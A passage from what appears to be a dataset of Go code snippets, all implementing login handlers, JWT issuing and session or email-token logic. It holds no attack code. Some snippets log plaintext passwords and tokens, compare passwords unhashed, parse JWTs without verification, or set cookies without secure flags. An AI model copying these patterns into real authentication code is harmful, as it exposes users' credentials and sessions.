csrf.Token(r))\n\t// Set cookie values and save\n\tsession.Values[\"authenticated\"] = true\n\tsession.Values[\"memberID\"] = m.ID\n\tif err = session.Save(r, w); err != nil {\n\t\tlog.Printf(\"Error saving session: %v\", err)\n\t}\n\tjson.NewEncoder(w).Encode(m)\n\t// w.Write([]byte(memberID)) // Alternative to fprintf\n}", "func (e *Email) generateEmailAuthToken(email string) string {\n\n\t// 创建验证信息存储,每10分钟执行一次GC\n\tstore := validate.NewMemoryStore(time.Second * 60 * 60)\n\t// 创建验证信息管理器,验证信息的过期时间为1小时\n\ttokenv := validate.NewTokenValidate(store, validate.Config{Expire: time.Second * 60 * 60})\n\t// 使用邮箱生成验证令牌\n\ttoken, err := tokenv.Generate(email)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\te.tokenv = tokenv\n\tglog.Infof(\"check user email token[%s]\\n\", token)\n\n\treturn token\n}", "func Login(w http.ResponseWriter, r *http.Request, DB *gorm.DB) {\n\tjwtSecretByte := []byte(os.Getenv(\"JWT_SECRET\"))\n\texpiresAt := time.Now().Add(30 * time.Minute)\n\tvar currentUser, dbUser User\n\terrorResponse := response.JsonResponse(\"An error occured\", 500)\n\tinvalidResponse := response.JsonResponse(\"Invalid credentials\", 501)\n\trequestBody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tjson.NewEncoder(w).Encode(errorResponse)\n\t}\n\tjson.Unmarshal(requestBody, &currentUser)\n\tpasswordByte := []byte(currentUser.Password)\n\tDB.Where(\"email = ?\", currentUser.Email).First(&dbUser)\n\tif dbUser.Email == \"\" {\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusForbidden)\n\t\tjson.NewEncoder(w).Encode(invalidResponse)\n\t} else {\n\t\tdbPasswordHash := []byte(dbUser.Password)\n\t\tverifyPassword := utils.VerifyHash(dbPasswordHash, passwordByte)\n\t\tif !verifyPassword {\n\t\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\t\tjson.NewEncoder(w).Encode(invalidResponse)\n\t\t} else {\n\t\t\tif dbUser.EmailVerified != true {\n\t\t\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\t\t\tverifyEmailResponse := response.JsonResponse(\"Verify your Email to Login\", 500)\n\t\t\t\tjson.NewEncoder(w).Encode(verifyEmailResponse)\n\t\t\t} else {\n\t\t\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\t\t\tw.WriteHeader(http.StatusOK)\n\t\t\t\t//////\n\t\t\t\tclaims := &Claims{\n\t\t\t\t\tID: dbUser.ID, //change to have the user id in here\n\t\t\t\t\tStandardClaims: jwt.StandardClaims{\n\t\t\t\t\t\t// In JWT, the expiry time is expressed as unix milliseconds\n\t\t\t\t\t\tExpiresAt: expiresAt.Unix(),\n\t\t\t\t\t},\n\t\t\t\t}\n\t\t\t\t// Declare the token with the algorithm used for signing, and the claims\n\t\t\t\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n\t\t\t\t// Create the JWT string\n\t\t\t\ttokenString, err := token.SignedString(jwtSecretByte)\n\t\t\t\tif err != nil {\n\t\t\t\t\tpanic(err)\n\t\t\t\t}\n\t\t\t\tloginResponse := map[string]interface{}{\n\t\t\t\t\t\"token\": tokenString,\n\t\t\t\t\t\"user\": dbUser,\n\t\t\t\t}\n\t\t\t\tjson.NewEncoder(w).Encode(loginResponse)\n\t\t\t}\n\t\t}\n\t}\n}", "func Login(c *fiber.Ctx) error {\n\tgodotenv.Load()\n\tu := new(types.User)\n\n\tif err := c.BodyParser(u); err != nil {\n\t\treturn c.SendStatus(fiber.StatusBadRequest)\n\t}\n\n\ttoken := jwt.New(jwt.SigningMethodHS256)\n\n\tclaims := token.Claims.(jwt.MapClaims)\n\tclaims[\"email\"] = u.Email\n\tclaims[\"admin\"] = false\n\tclaims[\"exp\"] = time.Now().Add(time.Hour * 96).Unix()\n\n\tt, err := token.SignedString([]byte(os.Getenv(\"SECRET_KEY\")))\n\tif err != nil {\n\t\treturn c.SendStatus(fiber.StatusInternalServerError)\n\t}\n\treturn c.JSON(fiber.Map{\"token\": t})\n}", "func tokenEmail(s string) (string, bool) {\n\tjwt, err := token.ParseInsecure(s)\n\tif err != nil {\n\t\treturn \"\", false\n\t}\n\treturn jwt.Payload.Email, jwt.Payload.Email != \"\"\n}", "func Login(\n\tgetUserByEmail dependencyGetUserByEmail,\n\tcreateAuthToken dependencyCreateAuthToken,\n) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\tpayload := loginPayload{}\n\t\tif err := c.BindJSON(&payload); err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tuser, err := getUserByEmail(payload.Email)\n\t\tif err != nil {\n\t\t\tswitch err {\n\t\t\tcase errors.ErrNotFound:\n\t\t\t\tc.AbortWithStatus(http.StatusNotFound)\n\t\t\tdefault:\n\t\t\t\tc.AbortWithError(http.StatusInternalServerError, err)\n\t\t\t}\n\t\t\treturn\n\t\t}\n\n\t\tif user.Status == models.UserStatusBanned {\n\t\t\tc.AbortWithStatus(http.StatusForbidden)\n\t\t\treturn\n\t\t}\n\n\t\t// create auth token with uuid v4\n\t\tauthToken := models.AuthToken{\n\t\t\tUserID: user.ID,\n\t\t\tAuthToken: uuid.NewV4().String(),\n\t\t}\n\t\tif err := createAuthToken(authToken); err != nil {\n\t\t\tc.AbortWithError(http.StatusInternalServerError, err)\n\t\t\treturn\n\t\t}\n\n\t\tc.JSON(http.StatusCreated, authToken)\n\t}\n}", "func (this *UserManagerImpl) Login(ss *user.Secret) (signedToken string, err error) {\n\tuser, err := user.Login(ss)\n\tif err != nil {\n\t\tappLogger.Debugf(\"User Login failed [%v]\\n\", err)\n\t\treturn \"\", err\n\t}\n\n\tvar isAdmin bool = false\n\tif user.Type == 0 {\n\t\tisAdmin = true\n\t}\n\tsignedToken = auth.CreateToken(user.Id, user.Name, isAdmin)\n\treturn signedToken, nil\n}", "func (r *apiV1Router) Login(ctx *gin.Context) {\n\temail := ctx.PostForm(\"email\")\n\tif email == \"\" {\n\t\tr.logger.Warn(\"email was not provided\")\n\t\tmodels.SendAPIError(ctx, http.StatusBadRequest, \"email must be provided\")\n\t\treturn\n\t}\n\n\tpassword := ctx.PostForm(\"password\")\n\tif password == \"\" {\n\t\tr.logger.Warn(\"password was not provided\")\n\t\tmodels.SendAPIError(ctx, http.StatusBadRequest, \"password must be provided\")\n\t\treturn\n\t}\n\n\tuser, err := r.userService.GetUserWithEmail(ctx, email)\n\tif err != nil {\n\t\tif err == services.ErrNotFound {\n\t\t\tr.logger.Warn(\"user not found\", zap.String(\"email\", email))\n\t\t\tmodels.SendAPIError(ctx, http.StatusUnauthorized, \"user not found\")\n\t\t} else {\n\t\t\tr.logger.Error(\"could not fetch user\", zap.Error(err))\n\t\t\tmodels.SendAPIError(ctx, http.StatusInternalServerError, \"there was a problem with fetching the user\")\n\t\t}\n\t\treturn\n\t}\n\n\terr = auth.CompareHashAndPassword(user.Password, password)\n\tif err != nil {\n\t\tr.logger.Warn(\"user not found\", zap.String(\"email\", email))\n\t\tmodels.SendAPIError(ctx, http.StatusUnauthorized, \"user not found\")\n\t\treturn\n\t}\n\n\tif !user.EmailVerified {\n\t\tr.logger.Warn(\"user's email not verified'\", zap.String(\"user id\", user.ID.Hex()), zap.String(\"email\", email))\n\t\tmodels.SendAPIError(ctx, http.StatusUnauthorized, \"user's email has not been verified\")\n\t\treturn\n\t}\n\n\ttoken, err := auth.NewJWT(*user, time.Now().Unix(), r.cfg.AuthTokenLifetime, auth.Auth, []byte(r.env.Get(environment.JWTSecret)))\n\tif err != nil {\n\t\tr.logger.Error(\"could not create JWT\", zap.String(\"user\", user.ID.Hex()), zap.Error(err))\n\t\tmodels.SendAPIError(ctx, http.StatusInternalServerError, \"there was a problem with creating authentication token\")\n\t\treturn\n\t}\n\n\tctx.Header(authHeaderName, token)\n\tctx.JSON(http.StatusOK, loginRes{\n\t\tResponse: models.Response{\n\t\t\tStatus: http.StatusOK,\n\t\t},\n\t\tToken: token,\n\t\tUser: *user,\n\t})\n}", "func (client AzureClient) Login(httpClient httpclient.HttpClient, browser browser.Browser) (string, error) {\n\tauthCode(browser)\n\tif authCodeValue == \"\" {\n\t\treturn \"\", errors.New(\"No auth code received\")\n\t}\n\ttoken, err := accessToken(httpClient)\n\treturn token, err\n}", "func AdminTokenVerifyMiddleWare(next http.HandlerFunc, db core.DBService) http.HandlerFunc {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\ttokenVerifyMiddleWare(\"Admin\", next, db, w, r)\n\t\treturn\n\t})\n}", "func (s *userService) ValidateLoginAndReturnJwtToken(req *request.Login) (string, error) {\n\tu, err := s.ur.FindByEmail(req.Email)\n\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif utils.CheckPasswordHash(req.Password, u.Password) == false {\n\t\treturn \"\", app.UnauthorizedError(\"JWT Login\")\n\t}\n\n\tmySigningKey := []byte(s.config.JwtSecret)\n\n\ttype jwtClaims struct {\n\t\tUserId int `json:\"user_id\"`\n\t\tAccountId int `json:\"account_id\"`\n\t\tjwt.StandardClaims\n\t}\n\n\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, jwtClaims{\n\t\tu.ID,\n\t\tu.AccountID,\n\t\tjwt.StandardClaims{\n\t\t\tExpiresAt: time.Now().AddDate(1, 0, 0).Unix(),\n\t\t\tIssuer: \"api\",\n\t\t},\n\t})\n\n\treturn token.SignedString(mySigningKey)\n}", "func (pg *PGClient) CreateLoginToken(email string, language string) (string, error) {\n\t// We deliberately don't validate the email address here. Email\n\t// addresses are a mess, and the simplest thing to do is just to\n\t// send an email to the address. If it doesn't work, then the entry\n\t// in the login_tokens table we create here will get cleaned up\n\t// after the token expires, and no harm done.\n\n\t// Do this in a transaction, since we want to clear out existing\n\t// tokens for the email address and ensure that we respect the token\n\t// uniqueness constraint.\n\ttx, err := pg.DB.Beginx()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tswitch err {\n\t\tcase nil:\n\t\t\terr = tx.Commit()\n\t\tdefault:\n\t\t\ttx.Rollback()\n\t\t}\n\t}()\n\n\t// Delete any existing tokens for this email, and at the same time\n\t// delete any expired tokens.\n\t_, err = tx.Exec(deleteTokenForEmail, email)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Create and insert a unique token.\n\ttoken := RandToken()\n\tfor {\n\t\tresult, err := tx.Exec(insertToken,\n\t\t\ttoken, email, language, time.Now().Add(LoginTokenDuration))\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\trows, err := result.RowsAffected()\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\tif rows == 1 {\n\t\t\tbreak\n\t\t}\n\n\t\t// Token collision: try again...\n\t\ttoken = RandToken()\n\t}\n\n\treturn token, nil\n}", "func Login(c *gin.Context) {\n\tvar customerForm models.CustomerForm\n\tif err := c.ShouldBindJSON(&customerForm); err != nil {\n\t\tc.JSON(http.StatusBadRequest, \"Incorrect user informations\")\n\t\treturn\n\t}\n\n\t// Try to find user with this address\n\tcustomer := models.Customer{\n\t\tEmail: customerForm.Email,\n\t}\n\tif err := repositories.FindCustomerByEmail(&customer); err != nil {\n\t\tc.JSON(http.StatusUnauthorized, \"incorrect email or password.\")\n\t\treturn\n\t}\n\n\t// Verify password\n\thashedPwd := services.HashPassword(customerForm.Password)\n\tif hashedPwd != customer.HashedPassword {\n\t\tc.JSON(http.StatusUnauthorized, \"incorrect email or password.\")\n\t\treturn\n\t}\n\n\t// Generate connection token\n\ttoken, err := services.GenerateToken(customer.Email)\n\tif err != nil {\n\t\tc.JSON(http.StatusInternalServerError, \"Couldn't create your authorization\")\n\t\treturn\n\t}\n\tvalidTime, _ := strconv.ParseInt(config.GoDotEnvVariable(\"TOKEN_VALID_DURATION\"), 10, 64)\n\n\tc.SetCookie(\"token\", token, 60*int(validTime), \"/\", config.GoDotEnvVariable(\"DOMAIN\"), false, false)\n\tc.JSON(http.StatusOK, \"Logged in successfully\")\n}", "func authorizeEmail(email string, w http.ResponseWriter, r *http.Request) {\n\tlog.Println(\"User\", email, \"logged in\")\n\tsession, _ := store.Get(r, serverConfig.CookieName)\n\tsession.Values[\"auth\"] = true\n\tsession.Values[\"email\"] = email\n\tsession.Save(r, w)\n}", "func (e Endpoints) Login(ctx context.Context, uuid string, password string) (token string, err error) {\n\trequest := LoginRequest{\n\t\tPassword: password,\n\t\tUuid: uuid,\n\t}\n\tresponse, err := e.LoginEndpoint(ctx, request)\n\tif err != nil {\n\t\treturn\n\t}\n\treturn response.(LoginResponse).Token, response.(LoginResponse).Err\n}", "func Login(res http.ResponseWriter, req *http.Request) {\n\tuser := new(model.User)\n\tID := req.Context().Value(\"ID\").(string)\n\tdata := req.Context().Value(\"data\").(*validation.Login)\n\tnow := time.Now().Unix()\n\tresponse := make(map[string]interface{})\n\tdocKey, err := connectors.ReadDocument(\"users\", ID, user)\n\tif err != nil {\n\t\trender.Render(res, req, responses.NewHTTPError(http.StatusServiceUnavailable, constants.Unavailable))\n\t\treturn\n\t} else if len(docKey) == 0 {\n\t\trender.Render(res, req, responses.NewHTTPError(http.StatusBadRequest, constants.NotFoundResource))\n\t\treturn\n\t}\n\ttimeDiff := time.Unix(user.OtpValidity, 0).Sub(time.Now())\n\tcompareOtp := bcrypt.CompareHashAndPassword([]byte(user.OTP), []byte(data.OTP))\n\tif compareOtp != nil || timeDiff < 0 {\n\t\trender.Render(res, req, responses.NewHTTPError(http.StatusBadRequest, constants.InvalidOTP))\n\t\treturn\n\t}\n\tif user.OtpType == constants.OTPType[\"email\"] {\n\t\tuser.EmailVerify = 1\n\t} else if user.OtpType == constants.OTPType[\"phone\"] {\n\t\tuser.PhoneVerify = 1\n\t}\n\tuser.OTP, user.OtpType, user.OtpValidity, user.LastLogedIn, user.UpdatedAt = \"\", \"\", 0, now, now\n\tdocKey, err = connectors.UpdateDocument(\"users\", docKey, user)\n\tif err != nil {\n\t\trender.Render(res, req, responses.NewHTTPError(http.StatusServiceUnavailable, constants.Unavailable))\n\t\treturn\n\t}\n\taccessToken, err := generateToken(docKey, \"aceessToken\", constants.AccessTokenValidity)\n\tif err != nil {\n\t\trender.Render(res, req, responses.NewHTTPError(http.StatusServiceUnavailable, constants.Unavailable))\n\t\treturn\n\t}\n\trefreshToken, err := generateToken(docKey, \"refreshToken\", constants.RefreshTokenValidity)\n\tif err != nil {\n\t\trender.Render(res, req, responses.NewHTTPError(http.StatusServiceUnavailable, constants.Unavailable))\n\t\treturn\n\t}\n\tresponse[\"accessToken\"] = accessToken\n\tresponse[\"refreshToken\"] = refreshToken\n\trender.Render(res, req, responses.NewHTTPSucess(http.StatusOK, response))\n}", "func (a *AuthController) Login(c *gin.Context) {\n\t// Retrieve the body\n\tloginUserForm := validator2.LoginUserForm{}\n\tif err := c.ShouldBindJSON(&loginUserForm); err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\"error\": err.Error()})\n\t\treturn\n\t}\n\n\t// Validate the form\n\tvalidate := validator.New()\n\terr := validate.Struct(loginUserForm)\n\n\t// Check if the form is valid\n\tif err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\"error\": err.Error()})\n\t\treturn\n\t}\n\n\t// Find the service\n\tuser, err := a.userService.FetchUserByEmail(loginUserForm.Email)\n\n\tif err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\n\t\t\t\"error\": \"Email or password incorrect\",\n\t\t\t\"code\": codeErrorEmailOrPasswordIncorrect,\n\t\t})\n\t\treturn\n\t}\n\n\t// Check if the password match\n\terr = bcrypt.CompareHashAndPassword([]byte(user.Password), []byte(loginUserForm.Password))\n\n\tif err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\n\t\t\t\"error\": \"Email or password incorrect\",\n\t\t\t\"code\": codeErrorEmailOrPasswordIncorrect,\n\t\t})\n\t\treturn\n\t}\n\n\t// Create the tokens\n\taccessToken, err := createAccessToken(user)\n\n\t// Send an error if the tokens didn't sign well\n\tif err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\n\t\t\t\"error\": err.Error(),\n\t\t\t\"code\": codeErrorServer,\n\t\t})\n\t\treturn\n\t}\n\n\t// Retrieve the refresh token\n\ttoken, err := a.tokenService.FetchTokenByUserId(user.ID)\n\tif err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\n\t\t\t\"error\": err.Error(),\n\t\t\t\"code\": codeErrorServer,\n\t\t})\n\t\treturn\n\t}\n\n\t// Send the tokens\n\tc.JSONP(http.StatusOK, gin.H{\n\t\t\"accessToken\": accessToken,\n\t\t\"refreshToken\": token.Token,\n\t\t\"expiresIn\": config.Conf.JwtTokenExpiration,\n\t})\n}", "func (con *Controller) LoginHandler(tokenCollection *mongo.Collection) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\n\t\temail := c.Query(\"email\")\n\t\tpassword := c.Query(\"password\")\n\n\t\tif email == \"\" || password == \"\" {\n\t\t\tsendFailedResponse(c, http.StatusBadRequest, \"please fill email and password\")\n\t\t\treturn\n\t\t}\n\n\t\taccessToken, err := con.Redis.Get(c, email).Result()\n\t\tif err != nil && accessToken != \"\" {\n\t\t\tsendSuccessResponse(c, http.StatusOK, gin.H{\n\t\t\t\t\"access_token\": accessToken,\n\t\t\t})\n\t\t\treturn\n\t\t}\n\n\t\tvar loginUser model.User\n\t\terr = con.Collection.FindOne(c, bson.M{\"email\": email}).Decode(&loginUser)\n\t\tif err != nil {\n\t\t\tsendFailedResponse(c, http.StatusNotFound, \"user not found\")\n\t\t\treturn\n\t\t}\n\n\t\terr = bcrypt.CompareHashAndPassword([]byte(loginUser.Password), []byte(password))\n\t\tif err != nil {\n\t\t\tsendFailedResponse(c, http.StatusNotFound, \"incorrect password\")\n\t\t\treturn\n\t\t}\n\n\t\tclaims := &Claims{\n\t\t\tID: loginUser.ID,\n\t\t\tEmail: loginUser.Email,\n\t\t\tStandardClaims: jwt.StandardClaims{\n\t\t\t\tExpiresAt: time.Now().Add(6 * time.Hour).Unix(),\n\t\t\t},\n\t\t}\n\n\t\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n\t\taccessToken, err = token.SignedString(secretKey)\n\t\tif err != nil {\n\t\t\tlog.Println(\"jwt-error: \", err.Error())\n\t\t\tsendFailedResponse(c, http.StatusInternalServerError, \"something went wrong\")\n\t\t\treturn\n\t\t}\n\n\t\tnewToken := model.AccessToken{\n\t\t\tUserID: loginUser.ID,\n\t\t\tAccessToken: accessToken,\n\t\t\tLoggedOut: false,\n\t\t\tRevoked: false,\n\t\t\tExpiresAt: primitive.NewDateTimeFromTime(time.Now().Add(6 * time.Hour).UTC()),\n\t\t\tCreatedAt: primitive.NewDateTimeFromTime(time.Now().UTC()),\n\t\t\tUpdatedAt: primitive.NewDateTimeFromTime(time.Now().UTC()),\n\t\t}\n\n\t\t_, err = tokenCollection.InsertOne(c, newToken)\n\t\tif err != nil {\n\t\t\tsendFailedResponse(c, http.StatusInternalServerError, \"something went wrong\")\n\t\t\tlog.Println(err.Error())\n\t\t\treturn\n\t\t}\n\n\t\terr = con.Redis.Set(c, loginUser.Email, accessToken, 6*time.Hour).Err()\n\t\tif err != nil {\n\t\t\tlog.Println(\"redis error: \", err.Error())\n\t\t}\n\n\t\tsendSuccessResponse(c, http.StatusOK, gin.H{\n\t\t\t\"access_token\": accessToken,\n\t\t})\n\t}\n}", "func Login(loginValidator DataLogin) (ResponseLogin, error) {\n\tresponseLogin := ResponseLogin{}\n\tpasswordHashed := EncryptPassword(loginValidator.Password)\n\tuser := User{}\n\n\tif !shared.GetDb().Where(\"email = ?\", loginValidator.Email).First(&user).RecordNotFound() {\n\t\tif passwordHashed == user.Password {\n\t\t\ttoken, err := GenerateToken([]byte(SigningKey), user.ID, user.Credential)\n\t\t\tif err == nil {\n\t\t\t\tresponseLogin.User = user\n\t\t\t\tresponseLogin.Token = token\n\t\t\t\treturn responseLogin, nil\n\t\t\t}\n\t\t}\n\t\treturn responseLogin, errors.New(\"La contraseña es invalida\")\n\t}\n\treturn responseLogin, errors.New(\"El correo no existe en la base de datos\")\n}", "func (e VerifyHandler) LoginHandler(w http.ResponseWriter, r *http.Request) {\n\n\t// GET /login?site=site&user=name&[email protected]\n\ttkn := r.URL.Query().Get(\"token\")\n\tif tkn == \"\" { // no token, ask confirmation via email\n\t\te.sendConfirmation(w, r)\n\t\treturn\n\t}\n\n\t// confirmation token presented\n\t// GET /login?token=confirmation-jwt&sess=1\n\tconfClaims, err := e.TokenService.Parse(tkn)\n\tif err != nil {\n\t\trest.SendErrorJSON(w, r, e.L, http.StatusForbidden, err, \"failed to verify confirmation token\")\n\t\treturn\n\t}\n\n\tif e.TokenService.IsExpired(confClaims) {\n\t\trest.SendErrorJSON(w, r, e.L, http.StatusForbidden, fmt.Errorf(\"expired\"), \"failed to verify confirmation token\")\n\t\treturn\n\t}\n\n\telems := strings.Split(confClaims.Handshake.ID, \"::\")\n\tif len(elems) != 2 {\n\t\trest.SendErrorJSON(w, r, e.L, http.StatusBadRequest, fmt.Errorf(\"%s\", confClaims.Handshake.ID), \"invalid handshake token\")\n\t\treturn\n\t}\n\tuser, address := elems[0], elems[1]\n\tsessOnly := r.URL.Query().Get(\"sess\") == \"1\"\n\n\tu := token.User{\n\t\tName: user,\n\t\tID: e.ProviderName + \"_\" + token.HashID(sha1.New(), address),\n\t}\n\t// try to get gravatar for email\n\tif e.UseGravatar && strings.Contains(address, \"@\") { // TODO: better email check to avoid silly hits to gravatar api\n\t\tif picURL, e := avatar.GetGravatarURL(address); e == nil {\n\t\t\tu.Picture = picURL\n\t\t}\n\t}\n\n\tif u, err = setAvatar(e.AvatarSaver, u, &http.Client{Timeout: 5 * time.Second}); err != nil {\n\t\trest.SendErrorJSON(w, r, e.L, http.StatusInternalServerError, err, \"failed to save avatar to proxy\")\n\t\treturn\n\t}\n\n\tcid, err := randToken()\n\tif err != nil {\n\t\trest.SendErrorJSON(w, r, e.L, http.StatusInternalServerError, err, \"can't make token id\")\n\t\treturn\n\t}\n\n\tclaims := token.Claims{\n\t\tUser: &u,\n\t\tStandardClaims: jwt.StandardClaims{\n\t\t\tId: cid,\n\t\t\tIssuer: e.Issuer,\n\t\t\tAudience: confClaims.Audience,\n\t\t},\n\t\tSessionOnly: sessOnly,\n\t}\n\n\tif _, err = e.TokenService.Set(w, claims); err != nil {\n\t\trest.SendErrorJSON(w, r, e.L, http.StatusInternalServerError, err, \"failed to set token\")\n\t\treturn\n\t}\n\tif confClaims.Handshake != nil && confClaims.Handshake.From != \"\" {\n\t\thttp.Redirect(w, r, confClaims.Handshake.From, http.StatusTemporaryRedirect)\n\t\treturn\n\t}\n\trest.RenderJSON(w, claims.User)\n}", "func Login(req *restful.Request, res *restful.Response) {\n\tvar loginRequest map[string]interface{}\n\terr := json.NewDecoder(req.Request.Body).Decode(&loginRequest)\n\tif err != nil {\n\t\tres.WriteError(http.StatusInternalServerError, err)\n\t}\n\n\t//Send email with url to complete login process from here\n\tres.WriteEntity(loginRequest[\"email\"])\n}", "func FrontLogin(context *gin.Context) {\n\n\tuserName := context.PostForm(\"user_name\")\n\tpassword := context.PostForm(\"password\")\n\n\t// 校验参数\n\tvalidCheck := validation.Validation{}\n\tvalidCheck.Required(userName, \"user_name\").Message(\"Must have user name\")\n\tvalidCheck.MaxSize(userName, 16, \"user_name\").Message(\"User name length can not exceed 16\")\n\tvalidCheck.MinSize(userName, 6, \"user_name\").Message(\"User name length is at least 6\")\n\tvalidCheck.Required(password, \"password\").Message(\"Must have password\")\n\tvalidCheck.MaxSize(password, 16, \"password\").Message(\"Password length can not exceed 16\")\n\tvalidCheck.MinSize(password, 6, \"password\").Message(\"Password length is at least 6\")\n\n\tresponseCode := constant.INVALID_PARAMS\n\tjwtStringRs := \"\"\n\tif !validCheck.HasErrors() {\n\t\tif models.CheckUser(userName, password) {\n\t\t\tif jwtString, err := utils.GenerateJWT(userName); err != nil {\n\t\t\t\tresponseCode = constant.JWT_GENERATION_ERROR\n\t\t\t} else {\n\t\t\t\t// pass auth validation\n\t\t\t\t// 1. set JWT to user's cookie\n\t\t\t\t// 2. add user to the Redis\n\t\t\t\tjwtStringRs = jwtString\n\t\t\t\tlog.Printf(\"jwtString->%v\\n\", jwtString)\n\t\t\t\tcontext.SetCookie(constant.JWT, jwtString,\n\t\t\t\t\tconstant.COOKIE_MAX_AGE, constant.SERVER_PATH,\n\t\t\t\t\tconstant.SERVER_DOMAIN, true, true)\n\t\t\t\tif err = utils.AddAuthToRedis(userName); err != nil {\n\t\t\t\t\tresponseCode = constant.INTERNAL_SERVER_ERROR\n\t\t\t\t} else {\n\t\t\t\t\tresponseCode = constant.USER_AUTH_SUCCESS\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tresponseCode = constant.USER_AUTH_ERROR\n\t\t}\n\t} else {\n\t\tfor _, err := range validCheck.Errors {\n\t\t\tlog.Println(err)\n\t\t}\n\t}\n\n\tuser := UserResponse{}\n\tuser.UserName = userName\n\tuser.Token = jwtStringRs\n\n\tcontext.JSON(http.StatusOK, gin.H{\n\t\t\"code\": responseCode,\n\t\t\"data\": user,\n\t\t\"msg\": constant.GetMessage(responseCode),\n\t})\n}", "func (a *App) Login(w http.ResponseWriter, r *http.Request) {\n\tvar resp = map[string]interface{}{\"status\": \"success\", \"message\": \"logged in\"}\n\n\tuser := &models.User{}\n\tbody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusBadRequest, err)\n\t\treturn\n\t}\n\n\terr = json.Unmarshal(body, &user)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusBadRequest, err)\n\t\treturn\n\t}\n\n\tuser.Prepare() // here strip the text of white spaces\n\n\terr = user.Validate(\"login\") // fields(email, password) are validated\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusBadRequest, err)\n\t\treturn\n\t}\n\n\tusr, err := user.GetUser(a.DB)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusInternalServerError, err)\n\t\treturn\n\t}\n\n\tif usr == nil { // user is not registered\n\t\tresp[\"status\"] = \"failed\"\n\t\tresp[\"message\"] = \"Login failed, please signup\"\n\t\tresponses.JSON(w, http.StatusBadRequest, resp)\n\t\treturn\n\t}\n\n\terr = models.CheckPasswordHash(user.Password, usr.Password)\n\tif err != nil {\n\t\tresp[\"status\"] = \"failed\"\n\t\tresp[\"message\"] = \"Login failed, please try again\"\n\t\tresponses.JSON(w, http.StatusForbidden, resp)\n\t\treturn\n\t}\n\ttoken, err := utils.EncodeAuthToken(usr.ID)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusBadRequest, err)\n\t\treturn\n\t}\n\n\tresp[\"token\"] = token\n\tresponses.JSON(w, http.StatusOK, resp)\n\treturn\n}", "func (c *ConfigurationData) GetOSORegistrationAppAdminToken() string {\n\treturn c.v.GetString(varOSORegistrationAppAdminToken)\n}", "func (n *NewLogger) Login(w http.ResponseWriter, r *http.Request) {\n\tn.l.Println(\"Starting login analysis...\")\n\n\t//get the users list\n\tif usersList == nil {\n\t\tusersList.GetUsers(n.l)\n\t}\n\n\t//validate update before proceed\n\tif usersList == nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\terr := json.NewDecoder(r.Body).Decode(&Credential)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tn.l.Printf(\"userlist: %v\", usersList)\n\tfor _, u := range usersList {\n\t\tn.l.Printf(\"user: %v\", u)\n\t\tusers[u.Username] = u.Password\n\n\t}\n\n\t//n.l.Printf(\"username: %v\", users[\"admin\"])\n\tn.l.Printf(\"username: %v\", Credential.Username)\n\tn.l.Printf(\"password: %v\", Credential.Password)\n\n\texpectedPass, ok := users[Credential.Username]\n\tif !ok || expectedPass != Credential.Password {\n\t\thttp.Error(w, \"Invalid credentials\", http.StatusUnauthorized)\n\t\treturn\n\n\t}\n\texpirationTimeAdmin := time.Now().Add(time.Minute * 60)\n\texpirationTimeGuest := time.Now().Add(time.Minute * 10)\n\n\tvar claims *Claims\n\tif Credential.Username == \"admin\" {\n\t\tclaims = &Claims{\n\t\t\tUsername: Credential.Username,\n\t\t\tStandardClaims: jwt.StandardClaims{\n\t\t\t\tExpiresAt: expirationTimeAdmin.Unix(),\n\t\t\t},\n\t\t}\n\t\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n\t\ttokenString, err := token.SignedString(jwtKey)\n\t\tif err != nil {\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t\thttp.SetCookie(w, &http.Cookie{\n\t\t\tName: \"token\",\n\t\t\tValue: tokenString,\n\t\t\tExpires: expirationTimeAdmin,\n\t\t})\n\t}\n\tif Credential.Username == \"guest\" {\n\t\tclaims = &Claims{\n\t\t\tUsername: Credential.Username,\n\t\t\tStandardClaims: jwt.StandardClaims{\n\t\t\t\tExpiresAt: expirationTimeGuest.Unix(),\n\t\t\t},\n\t\t}\n\t\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n\t\ttokenString, err := token.SignedString(jwtKey)\n\t\tif err != nil {\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t\thttp.SetCookie(w, 